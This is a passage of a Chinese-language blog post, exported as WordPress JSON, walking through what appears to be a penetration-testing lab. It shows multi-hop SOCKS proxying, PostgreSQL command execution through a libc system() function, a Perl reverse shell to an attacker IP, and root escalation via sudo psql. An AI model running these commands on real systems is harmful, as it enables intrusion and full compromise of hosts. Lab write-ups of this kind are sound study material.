src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-18.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<p>\u63a5\u7740\u628a\u53d7\u63a7\u7aef\u4f20\u5230web3\u4e0a\uff0c\u53d1\u8d77\u5bf9web1\u7684\u8fde\u63a5<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>.\/linux_x64_agent -c 172.30.12.5:1234 -s 123 --reconnect 8<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-19.jpg'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-19.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<p>\u7136\u540e\u6211\u4eecVPS\u4e0a\u4f1a\u8bf4\u6709\u65b0\u8282\u70b9\u52a0\u5165\uff0c\u8fd9\u5c31\u8bf4\u660e\u6211\u4eec\u7684\u591a\u5c42\u4ee3\u7406\u63a5\u5165\u6210\u529f\u4e86<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-20.jpg'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-20.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<p> \u7136\u540eback\u56deadmin\uff0c\u518duse 1\uff0csocks 9384\uff0c\u5c31\u53ef\u4ee5\u57289384\u5efa\u7acb\u5bf9web3\u7684\u591a\u5c42\u4ee3\u7406\uff0c\u540c\u65f6\u4e5f\u4e0d\u4f1a\u5f71\u54cd\u4e4b\u524d\u5728web1\u4e0a\u5efa\u7acb\u7684\u4ee3\u7406<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-21.jpg'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-21.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<p><figure class=\"wp-block-image size-large\"><\/figure> \u7136\u540e\u6211\u4eec\u7528\u65b0\u4ee3\u7406\u5728\u672c\u5730\u8fdepostgresql<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-22.jpg'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-22.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<p>\u8981\u505a\u7684\u5c31\u4fe9\u4e8b\uff0c\u7b2c\u4e00\u4e2a\u4e8b\u662f\u6539root\u5bc6\u7801\uff0c\u547d\u4ee4\u662fALTER USER root WITH PASSWORD &#8216;123456&#8217;;<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-23.jpg'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-23.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<p>\u63a5\u7740\u662f\u5f39shell\uff0c\u7c7b\u4f3c\u4e8e\u65e0\u95f4\u8ba1\u5212\u91cc\u90a3\u4e2aoracle\uff0cpsql\u4e5f\u53ef\u4ee5\u521b\u5efa\u51fd\u6570\u6267\u884c\u547d\u4ee4\uff0c\u7f3a\u70b9\u662f\u6ca1\u56de\u663e<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>CREATE OR REPLACE FUNCTION system (cstring) RETURNS integer AS '\/lib\/x86_64-linux-gnu\/libc.so.6', 'system' LANGUAGE 'c' STRICT;\nselect system('curl 172.30.54.179');<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-24.jpg'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-24.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<p>\u8fd9\u65f6\u4e0d\u96be\u60f3\u5230\u5f39shell\uff0cbash\u4e4b\u7c7b\u7684\u5f39\u4e0d\u4e86\uff0c\u4f46\u80fd\u7528perl\u5f39\uff0c\u8fd9\u4e2a\u6211\u4e4b\u524d\u4e5f\u63d0\u5230\u8fc7\uff0c\u5728\u540e\u6e17\u900f\u4e4b\u6587\u4ef6\u4e0b\u8f7d\u90a3\u91cc\uff0c\u65e2\u7136\u80fd\u6267\u884c\u8fdc\u7a0b\u4e0b\u8f7d\u6587\u4ef6\u7684\u4ee3\u7801\uff0c\u5f53\u7136\u4e5f\u80fd\u6267\u884c\u5f39shell\u7684\u4ee3\u7801<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select system('perl -e \\'use Socket;$i=\"172.30.54.179\";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&amp;S\");open(STDOUT,\">&amp;S\");open(STDERR,\">&amp;S\");exec(\"\/bin\/sh -i\");};\\'');<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-12.jpg'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-12.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<p>  sudo -l\u770b\u5230\u6709psql\u547d\u4ee4\uff0c\u5148\u8f93\u5165python3 -c &#8216;import pty;pty.spawn(&#8220;\/bin\/bash&#8221;)&#8217;\u8fdb\u5165\u4ea4\u4e92\u5f0fshell\uff0c\u7136\u540e\u8f93\u5165sudo \/usr\/local\/postgresql\/bin\/psql\u8fdb\u884c\u63d0\u6743\uff0c\u5728\u8fd9\u91cc\u7684root\u5bc6\u7801\u5c31\u662f\u6211\u4eec\u521a\u521a\u81ea\u5df1\u6539\u7684123456<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-25.jpg'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-25.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<p>\u7136\u540e\u5927\u81f4\u7684\u6d41\u7a0b\u662f<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>root=# \\?\r\nInput\/Output\r\n!\/bin\/bash\r\nroot@web04:\/usr\/local\/pgsql\/data# whoami\r\nroot<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-13.jpg'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F01%2F06-13.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n","protected":false},"excerpt":{"rendered":"<p>\u8003\u70b9\uff1a<br \/>\nSpring boot actuator unauthorized access<br \/>\nshiro\u53cd\u5e8f\u5217\u5316RCE<br \/>\nvim.basic\u63d0\u6743<br \/>\nNacos SnakeYaml\u53cd\u5e8f\u5217\u5316<br \/>\nFastjson<br \/>\nGrafana\u4efb\u610f\u6587\u4ef6\u8bfb\u6f0f\u6d1e<br \/>\npsql<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11],"tags":[],"class_list":["post-3072","post","type-post","status-publish","format-standard","hentry","category-11"],"_links":{"self":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/3072","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/comments?post=3072"}],"version-history":[{"count":9,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/3072\/revisions"}],"predecessor-version":[{"id":3081,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/3072\/revisions\/3081"}],"wp:attachment":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/media?parent=3072"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/categories?post=3072"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/tags?post=3072"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}